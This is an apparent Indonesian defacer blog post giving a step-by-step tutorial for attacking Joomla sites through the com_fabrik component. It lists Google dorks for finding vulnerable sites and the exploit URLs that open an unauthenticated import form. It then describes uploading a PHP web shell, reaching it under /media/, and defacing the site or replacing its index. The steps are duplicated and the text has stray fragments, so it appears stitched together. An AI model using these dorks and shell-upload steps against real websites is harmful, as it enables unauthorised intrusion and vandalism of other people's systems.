E-currency exchangers list
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Vulnerability ~ Muncul Form Upload *seperti di gambar:
4. Shell/File Akses: /media/namafileagan
contoh: target.coli/media/nueenggakpernah.php
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela
Hello Defacer!!!
Ketemu ama MrCr4cker :D , Nah kali ini Gue cuma mau brbagi tentang salah satu Exploit Joomla(salah satu Bug/Celah pada CMS Joomla).
Yupz, Tutorial Deface CMS Joomla dengan Exploit Com_Fabrik.
Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Fabrik di CMS Joomla.
Iseng2 buka folder lama, eh nemu file txt yg berisi webtarget vuln, pas di coba ada 1 web nih yg masih vuln com_fabrik, haha yowes gua bikin bahan utk tutorial artikel diBlog ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak >.<" . *curhatan mengenang masalalu :'D
Let's Play with me Baby ;*
Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Vulnerability ~ Muncul Form Upload *seperti di gambar:
 |
| Upload Shell/File agan, Lalu Klik Import CSV |
4. Shell/File Akses: /media/namafileagan
contoh: target.coli/media/nueenggakpernah.php
 |
| Gimana Mau PhP, HTML aja masih belajar :'D |
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela
Comments
Post a Comment